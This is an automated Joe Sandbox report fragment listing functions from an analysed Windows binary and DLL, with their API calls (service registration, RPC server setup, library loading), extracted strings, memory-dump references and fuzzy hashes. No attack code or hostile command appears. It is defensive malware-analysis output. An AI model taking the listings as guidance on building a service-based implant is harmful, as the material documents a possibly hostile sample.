                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$Info
                                                      • String ID:
                                                      • API String ID: 1775632426-0
                                                      • Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                      • Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
                                                      • Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
                                                      • Instruction Fuzzy Hash: 266181B2200B808AE762DF23B8407AA66E5F74C7E8F548325BF6947BF4DB74C555A700
                                                      Function 00007FF8FF5D712C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF8FF5D72EB,?,?,?,00007FF8FF5D3EC0,?,?,?,?,00007FF8FF5D3CFD), ref: 00007FF8FF5D71B1
                                                      • GetLastError.KERNEL32(?,?,?,00007FF8FF5D72EB,?,?,?,00007FF8FF5D3EC0,?,?,?,?,00007FF8FF5D3CFD), ref: 00007FF8FF5D71BF
                                                      • LoadLibraryExW.KERNEL32(?,?,?,00007FF8FF5D72EB,?,?,?,00007FF8FF5D3EC0,?,?,?,?,00007FF8FF5D3CFD), ref: 00007FF8FF5D71E9
                                                      • FreeLibrary.KERNEL32(?,?,?,00007FF8FF5D72EB,?,?,?,00007FF8FF5D3EC0,?,?,?,?,00007FF8FF5D3CFD), ref: 00007FF8FF5D7257
                                                      • GetProcAddress.KERNEL32(?,?,?,00007FF8FF5D72EB,?,?,?,00007FF8FF5D3EC0,?,?,?,?,00007FF8FF5D3CFD), ref: 00007FF8FF5D7263
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Library$Load$AddressErrorFreeLastProc
                                                      • String ID: api-ms-
                                                      • API String ID: 2559590344-2084034818
                                                      • Opcode ID: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                      • Instruction ID: 103399461ecc0a7b703815778fca120305f3542a0547ea5dfb419ff120a518df
                                                      • Opcode Fuzzy Hash: bd0a8d2a555e0ee16e973e96254fe36908eaf1a6b67fdf5dc890da79f6d47fff
                                                      • Instruction Fuzzy Hash: 3031C121A1F6829AEF159B42AC005BD6298BF6CBE0F594734ED3D4A7D4EF7CE4458700
                                                      Function 00007FF8FF5D9444 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Value$ErrorLast
                                                      • String ID:
                                                      • API String ID: 2506987500-0
                                                      • Opcode ID: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                      • Instruction ID: 53e852e0db90ff7e4d6fac6662274a240d19837ec6ad9739ba77687986f903a6
                                                      • Opcode Fuzzy Hash: bb16a7b3e3e618224ffaf8681bb99f7b7eedade10f219c40875930e32152d962
                                                      • Instruction Fuzzy Hash: 36213B20E0EA475FFB59AB615D5213D6252AF6C7F0F144738E97E0BBD7EE2CA4418600
                                                      Function 00007FF8FF5E0100 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                      • String ID: CONOUT$
                                                      • API String ID: 3230265001-3130406586
                                                      • Opcode ID: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                      • Instruction ID: d7517f3f007c25f50fef616cfe7aedc0d7ef370b6f3d1310dfb20c19ca8917af
                                                      • Opcode Fuzzy Hash: ba28877f08bf85aa9c21e7c9a24742ae6402465733c9a5e3506a903d1d24cb53
                                                      • Instruction Fuzzy Hash: 87114C32B18B418AE7508B52AC4532976A0BBACBE4F444334EA7D87BD4DF7CD9448B44
                                                      Function 0000000140001270 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 41registrysynchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RegisterServiceCtrlHandlerW.ADVAPI32 ref: 0000000140001282
                                                      • CreateEventW.KERNEL32 ref: 00000001400012C0
                                                        • Part of subcall function 0000000140003F80: InitializeCriticalSection.KERNEL32 ref: 0000000140003FA2
                                                        • Part of subcall function 0000000140003F80: GetCurrentProcess.KERNEL32 ref: 0000000140003FF6
                                                        • Part of subcall function 0000000140003F80: OpenProcessToken.ADVAPI32 ref: 0000000140004007
                                                        • Part of subcall function 0000000140003F80: GetLastError.KERNEL32 ref: 0000000140004011
                                                        • Part of subcall function 0000000140003F80: EnterCriticalSection.KERNEL32 ref: 00000001400040B3
                                                        • Part of subcall function 0000000140003F80: LeaveCriticalSection.KERNEL32 ref: 000000014000412B
                                                        • Part of subcall function 0000000140003F80: GetVersionExW.KERNEL32 ref: 0000000140004155
                                                        • Part of subcall function 0000000140003F80: RpcSsDontSerializeContext.RPCRT4 ref: 000000014000416C
                                                        • Part of subcall function 0000000140003F80: RpcServerUseProtseqEpW.RPCRT4 ref: 0000000140004189
                                                        • Part of subcall function 0000000140003F80: RpcServerRegisterIfEx.RPCRT4 ref: 00000001400041B9
                                                        • Part of subcall function 0000000140003F80: RpcServerListen.RPCRT4 ref: 00000001400041D3
                                                      • SetServiceStatus.ADVAPI32 ref: 0000000140001302
                                                      • WaitForSingleObject.KERNEL32 ref: 0000000140001312
                                                        • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042BB
                                                        • Part of subcall function 00000001400042B0: CancelWaitableTimer.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042C8
                                                        • Part of subcall function 00000001400042B0: SetEvent.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042D5
                                                        • Part of subcall function 00000001400042B0: WaitForSingleObject.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042E7
                                                        • Part of subcall function 00000001400042B0: TerminateThread.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400042FD
                                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000430A
                                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004317
                                                        • Part of subcall function 00000001400042B0: CloseHandle.KERNEL32(?,?,?,?,000000014000131D), ref: 0000000140004324
                                                        • Part of subcall function 00000001400042B0: RpcServerUnregisterIf.RPCRT4 ref: 0000000140004336
                                                        • Part of subcall function 00000001400042B0: RpcMgmtStopServerListening.RPCRT4 ref: 000000014000433E
                                                        • Part of subcall function 00000001400042B0: EnterCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000435A
                                                        • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000437F
                                                        • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 000000014000438C
                                                        • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043C0
                                                        • Part of subcall function 00000001400042B0: LeaveCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043CC
                                                        • Part of subcall function 00000001400042B0: DeleteCriticalSection.KERNEL32(?,?,?,?,000000014000131D), ref: 00000001400043D9
                                                        • Part of subcall function 00000001400042B0: #4.VSELOG(?,?,?,?,000000014000131D), ref: 00000001400043E6
                                                      • SetServiceStatus.ADVAPI32 ref: 000000014000134B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$Server$CloseEnterHandleLeaveService$DeleteEventObjectProcessRegisterSingleStatusWait$CancelContextCreateCtrlCurrentDontErrorHandlerInitializeLastListenListeningMgmtOpenProtseqSerializeStopTerminateThreadTimerTokenUnregisterVersionWaitable
                                                      • String ID: vseamps
                                                      • API String ID: 3197017603-3944098904
                                                      • Opcode ID: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                      • Instruction ID: 0252cca9582b7aeb0e5a7a434c8e7364f46e89616d8e728b6478e43ab65cb610
                                                      • Opcode Fuzzy Hash: 4fcaac044f33b8282c396f0e62c58db51f87a82aaa34d44751bf9634b5fd9f61
                                                      • Instruction Fuzzy Hash: B921A2B1625A009AEB02DF17FC85BD637A0B74C798F45621AB7498F275CB7EC148CB00
                                                      Function 00000001400011F0 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 24windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Messagesprintf_s
                                                      • String ID: 10:52:57$Help$Jul 5 2019$usage: /service - creates the Update Notification Service /remove - removes the Update Notification Service from the sy
                                                      • API String ID: 2642950106-3610746849
                                                      • Opcode ID: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                      • Instruction ID: 92f91a294e228129c374272f9a209b177778b3d46068e39525b46f8f62cf975d
                                                      • Opcode Fuzzy Hash: 3f0d62457ab29cf1d3a00b30af1be048753c3c69edf33eb8bb254d4fd9f99961
                                                      • Instruction Fuzzy Hash: 78F01DB1221A8595FB52EB61F8567D62364F78C788F811112BB4D0B6BADF3DC219C700
                                                      Function 0000000140002650 Relevance: 10.0, APIs: 8, Instructions: 43memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                      • Instruction ID: 80974503ddc58818480ab649a73b779641f1d99de81085d1f592bfbfa5fc6ad1
                                                      • Opcode Fuzzy Hash: 59e576179aebbdeaae5a9514a8abdff9d95dfae3be86bd59f8deebe969e5cf48
                                                      • Instruction Fuzzy Hash: 9C01EDB8701B8041EB0BDFE7B60839992A2AB8DFD5F185024AF1D17779DE3AC4548700
                                                      Function 0000000140002970 Relevance: 10.0, APIs: 8, Instructions: 40memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                      • Instruction ID: 9f3d0c666f817a9e432213240f72880bf7997caebe097eb0308f7621ef9b933c
                                                      • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                                      • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                                      Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                                      • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                                      • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: StringType$ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 319667368-0
                                                      • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                      • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                                      • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                                      • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                                      Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                                      • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                                        • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                                      • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                                      • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                                      • String ID:
                                                      • API String ID: 1390108997-0
                                                      • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                      • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                                      • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                                      • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                                      Function 00007FF8FF5D4CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                      • String ID: csm$csm$csm
                                                      • API String ID: 3523768491-393685449
                                                      • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                      • Instruction ID: e0e271bb40abb4f2cf47364b63e770f9e27d9a58991cb7a1d196f06abfd1cc79
                                                      • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                                      • Instruction Fuzzy Hash: 61E1A03290D7828FE7109F64D8802AD7BA4FB69B88F144235DEBD57696DF38E486C701
                                                      Function 00007FF8FF5D95BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,?,00007FF8FF5D8BC9,?,?,?,?,00007FF8FF5D8C14), ref: 00007FF8FF5D95CB
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D8BC9,?,?,?,?,00007FF8FF5D8C14), ref: 00007FF8FF5D9601
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D8BC9,?,?,?,?,00007FF8FF5D8C14), ref: 00007FF8FF5D962E
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D8BC9,?,?,?,?,00007FF8FF5D8C14), ref: 00007FF8FF5D963F
                                                      • FlsSetValue.KERNEL32(?,?,?,00007FF8FF5D8BC9,?,?,?,?,00007FF8FF5D8C14), ref: 00007FF8FF5D9650
                                                      • SetLastError.KERNEL32(?,?,?,00007FF8FF5D8BC9,?,?,?,?,00007FF8FF5D8C14), ref: 00007FF8FF5D966B
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Value$ErrorLast
                                                      • String ID:
                                                      • API String ID: 2506987500-0
                                                      • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                      • Instruction ID: 44bca03d13a24281a7c6a4949ba6fbac120242c1b15b51fede5687f53ae565f9
                                                      • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                                      • Instruction Fuzzy Hash: 8D111720F0E2424FFB59AB615D5213D61929F6C7F0F444735E93E0B7DAEE2CA4428700
                                                      Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                                      • String ID:
                                                      • API String ID: 3326452711-0
                                                      • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                      • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                                      • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                                      • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                                      Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeaveTimerWaitable
                                                      • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                                      • API String ID: 2984211723-1229430080
                                                      • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                      • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                                      • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                                      • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                                      Function 00007FF8FF5D7F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                      • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                      • String ID: CorExitProcess$mscoree.dll
                                                      • API String ID: 4061214504-1276376045
                                                      • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                                      • Instruction ID: 47a797a30a50b95a6a31a763f649a1e0c02c917cb9e875de25bd038fce84a9cc
                                                      • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
